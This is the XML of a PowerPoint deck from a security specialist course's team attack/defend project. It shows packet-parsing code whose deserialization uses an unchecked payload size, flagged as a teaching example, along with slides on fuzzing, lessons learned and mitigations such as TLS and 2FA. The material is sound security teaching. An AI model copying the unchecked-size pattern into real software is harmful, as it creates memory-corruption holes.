              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ppkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>hdr.msgtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>);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	if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>deSerialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ppkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt;payload, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>payload_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>payload_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> is too big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}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 smtClean="0"/>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR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2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" y="518160"/>
            <a:ext cx="11216640" cy="5967630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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// ProtocolManager.cpp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CBaseProtocol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CProtocolManager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::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parse_packet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MyPacket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{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CBaseProtocol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*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=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nullptr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/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>payload_size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-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sizeof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MyPacketHeader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)/* 16 */;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 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length=%d  head=[%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c%c%c%c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]\n", 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hdr.size,ppkt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[0],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[1],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[2],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[3]);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if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[0]=='S' &amp;&amp;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[1]=='B'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&amp;&amp;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     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[2]=='1'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&amp;&amp; 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-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hdr.head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[3]=='T' ) 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=%d\n",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printf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header : timestamp=%d\n",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hdr.timestamp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 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=</a:t>
            </a:r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create_protocol_instance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MsgReq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hdr.msgtype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	if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deSerialize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-&gt;payload,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payload_size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); //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payload_size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is too big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}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	return </a:t>
            </a:r>
            <a:r>
              <a:rPr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cpkt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;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR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}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7448" y="2518913"/>
            <a:ext cx="101020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/>
              <a:t>Do you think ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>payload_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" b="1" dirty="0" smtClean="0"/>
              <a:t>’ would </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" b="1" dirty="0" smtClean="0"/>
              <a:t>have an appropriate value???</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241464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Phase 1 wrap-up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Attack goal setting : CIA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Design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Target system understanding : Crypto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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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: Resource restriction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Vulnerability analysis : Approaches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Techniques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Penetration test : Cases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Lessons learned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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="948906"/>
            <a:ext cx="10515600" cy="522805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/>
              <a:t>Threats were well defended against the parts we knew, but not other parts we don't know. So, it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>necessary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>to get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>advice from many experts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Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>the attack was mainly based on the low-hanging fruit, we felt that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>easily accessible attack surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> should be thoroughly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secured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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>deriving threats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> to identify it, there were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>too many false positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> threats. And it took a lot of effort to sort them out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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/>
              <a:t>We understood how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> works, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>and when applied, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>were surprised </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>that vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>could be found in unexpected places</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Plus, it's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>difficult to make the modeling rules based on the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>system.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rgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Root of trust must be trustworthy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> to build a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>secure.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0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9657" y="812802"/>
            <a:ext cx="11843657" cy="58710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Separate meta data from image on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use TLS in 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57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5724" y="146649"/>
            <a:ext cx="8146115" cy="6297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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Derive mitigations</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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59657" y="812802"/>
            <a:ext cx="11843657" cy="587102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36000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Introduce login system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Force users to use strong password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Encrypt the hashed credential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Apply 2FA (what you know + what you are)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Separate meta data from image on </a:t>
            </a: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network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Encrypt the image +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verified crypto algorithm (AES256-CBC)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Embed the root key into code obfuscated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a random file name in the storage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solidFill>
                  <a:schemeClr val="bg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Use TLS in network communication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9447" y="1136652"/>
            <a:ext cx="5880577" cy="9541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allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anonymous users to access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> the system</a:t>
            </a:r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7382314" y="2282901"/>
            <a:ext cx="3927953" cy="138499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 user data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> inside the target machine</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6178170" y="3860038"/>
            <a:ext cx="5272315" cy="95410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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> user data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>over network</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="280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76835" y="5006287"/>
            <a:ext cx="4100740" cy="1384995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Against vulnerability that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leaks secret key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> inside the target machine</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42606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57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99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 rot="20118305">
            <a:off x="1345423" y="2958563"/>
            <a:ext cx="4734688" cy="923330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>
                    <a:lumMod val="75000"/>
                  </a:schemeClr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DEPENDER</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr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02054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1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4000">
              <a:solidFill>
                <a:schemeClr val="bg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32810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ko-KR" altLang="en-US" sz="400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0757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2534960"/>
            <a:ext cx="172402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 rot="20118305">
            <a:off x="6114665" y="2958563"/>
            <a:ext cx="4734688" cy="923330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C00000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ATTACKER</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill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02054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1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="400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2810" y="2011740"/>
            <a:ext cx="559913" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:noFill/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6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4000">
              <a:solidFill>
                <a:schemeClr val="bg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2048</TotalTime>
  <Words>2021</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>703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HY목각파임B</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Bahnschrift</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CMU Security Specialist Course  Team Project Phase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CMU Security Specialist Course  Team Project : Phase 1</dc:title>
  <dc:creator>박병철/책임연구원/SW Platform(연)Advanced OS TP(byungchul.park@lge.com)</dc:creator>
  <cp:lastModifiedBy>박병철/책임연구원/SW Platform(연)Advanced OS TP(byungchul.park@lge.com)</cp:lastModifiedBy>
  <cp:revision>160</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-16T06:07:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-01T09:46:30Z</dcterms:modified>
</cp:coreProperties>
</file>